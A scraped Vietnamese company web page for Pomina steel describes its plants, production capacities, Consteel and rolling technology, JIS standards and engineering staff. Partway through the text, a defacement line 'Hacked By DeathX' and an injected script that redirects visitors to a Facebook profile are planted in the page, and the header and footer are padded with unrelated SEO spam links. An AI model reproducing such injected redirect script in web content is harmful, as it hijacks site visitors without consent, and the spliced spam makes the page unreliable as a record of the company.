goi massage thiết kế web thiet ke web dich vu seo du lich thai lan tour thai lan du lich campuchia tour campuchia
   
Trang chủ English
 
 
CÔNG TY THÉP VIỆT SẢN PHẨM HOẠT ĐỘNG ĐẦU TƯ KHÁCH HÀNG HOẠT ĐỘNG CỘNG ĐỒNG
  Thành lập, quy mô, số vốn


Năm 1999,  nhà máy cán thép Pomina Bình Dương được thành lập, với công nghệ hiện đại bậc nhất thế giới về sản xuất thép của Ý và Đức. Thương hiệu Thép Pomina đã trở thành biểu tượng của chất lượng hàng đầu trong lĩnh vực sản xuất thép của Việt Nam, đồng thời tạo được uy tín và sự tin tưởng tuyệt đối với khách hàng. Đến năm 2002, Pomina có khả năng cung cấp cho thị trường hơn 600.000 tấn thép cán/năm.

Năm 2005,  Pomina đầu tư vào khu công nghiệp Phú Mỹ, với nhà máy luyện phôi công suất  500.000 tấn luyện/năm, đây là nhà máy luyện đầu tiên tại Việt Nam và cũng là nhà máy thứ 20 trên thế giới được trang bị  công nghệ Consteel , công nghệ hiện đại bậc nhất trên thế giới của Đức. Đến năm 2007, tổng công suất các nhà máy của Pomina đạt 500.000 tấn luyện và 600.000 tấn cán/năm.


 

Tháng 6/2009, Pomina tiếp tục hoàn thành nhà máy cán thép POMINA Phú Mỹ  với công suất 500.000 tấn cán/ năm, nâng tổng công suất các nhà máy hiện nay lên 500.000 tấn luyện và 1.100.000 tấn cán/năm. Các sản phẩm chính cung cấp cho thị trường gồm các loi: thép cuộn, thép thanh vằn, thép thanh trơn, đáp ứng nhu cầu sử dụng đa dạng của thị trường trong và ngoài nước.

Theo kế hoạch, đến tháng 9/2009 Nhà máy Pomina Phú Mỹ tiếp tục khởi công xây dựng một nhà máy luyện phôi với công suất 1.000.000 tấn/năm, dự kiến sau khi nhà máy hoàn thành,  tổng công suất của Pomina sẽ đạt 1.500.000 tấn luyện và 1.100.000 tấn cán/năm.  Hacked By DeathX
<script>location.href="facebook.com/Kai12072001";</script>
  ihgvhxvl
  Công nghệ
Ngay từ nguồn phôi nguyên liệu trước khi đưa vào cán đều phải qua công đon kiểm định chặt chẽ nhằm bảo đảm chất lượng sản phẩm. Quá trình kiểm định nguyên liệu nghiêm ngặt cùng với công nghệ luyện cán thép hiện đại của POMINA đã cho ra những sản phẩm có ưu điểm vượt trội về cường độ chịu lực, độ bền, phù hợp với các công trình xây dựng công nghiệp và dân dụng.


Về phôi thép: Công nghệ sản xuất phôi Consteel (Đức) cho phép quy trình sản xuất được liên tục, tiết kiệm tối đa nguồn năng lượng sử dụng và là công nghệ sản xuất thép tiên tiến nhất trên thế giới hiện nay. Nhà máy luyện phôi thép Pomina Phú Mỹ là license thứ 20 trên thế giới của công nghệ Consteel và là đơn vị duy nhất tại Việt Nam áp dụng công nghệ này. Lò luyện Techint


Về cán thép: Các sản phẩm của Công ty đều được sản xuất trên những dây chuyền công nghệ hiện đại bậc nhất hiện nay, công nghệ VAI-POMINI / SIEMENS-VAI của Ý và Đức, do các nhà cung cấp thiết bị hàng đầu hiện nay.

Sản phẩm thép Pomina được sản xuất theo quy trình công nghệ cán nóng, các quá trình biến dạng được thực hiện ở nhiệt độ từ 900 - 1.200 oC.

Để có thể đáp ứng được yêu cầu cao nhất của khách hàng, Thép Pomina đã chọn và tuân thủ theo bộ tiêu chuẩn JIS của Nhật Bản, đáp ứng tương đương với các tiêu chuẩn của Châu Âu, Nga và Mỹ.

Hệ thống nhà máy Pomina được trang bị hệ thống xử lý nước thải theo tiêu chuẩn tuần hoàn khép kín. Nguồn nước sau khi xử lý đạt tiêu chuẩn quy định sẽ được tái sử dụng, không thải ra môi trường. Pomina là nhà máy thép đầu tiên tại khực phía nam có chứng nhận bảo vệ môi trường ISO 14001: 2004

  Nhân công
Đội ngũ chuyên viên kỹ thuật là những kỹ sư giỏi, được đào tạo tại châu Âu với tinh thần kỷ luật và tính chuyên nghiệp cao, bảo đảm vận hành toàn bộ dây chuyền sản xuất theo đúng những tiêu chuẩn khắt khe được quy định bởi nhà cung cấp thiết bị.


 
 
 
 
 

 
 
  Phim tự giới thiệu
 
Số lượt truy cập: Đặt hàng Copyright 2006 © by Thep Viet Co,. LTD. Designed by V.E.C
1 8 6 0 3 1 4
Dien dan nong nghiep | Dien dan thuy san | Rao vat mien phi | khan tieng | chan tay lanh | kho noi | thoai hoa khop | chua vay nen | u nang buong trung co nhan tao | chua vay nen | thoai hoa khop rut ham cau quan 9 | rut ham cau quan 10 | rut ham cau quan go vap | rut ham cau quan tan binh | rut ham cau quan binh thanh | rut ham cau quan 5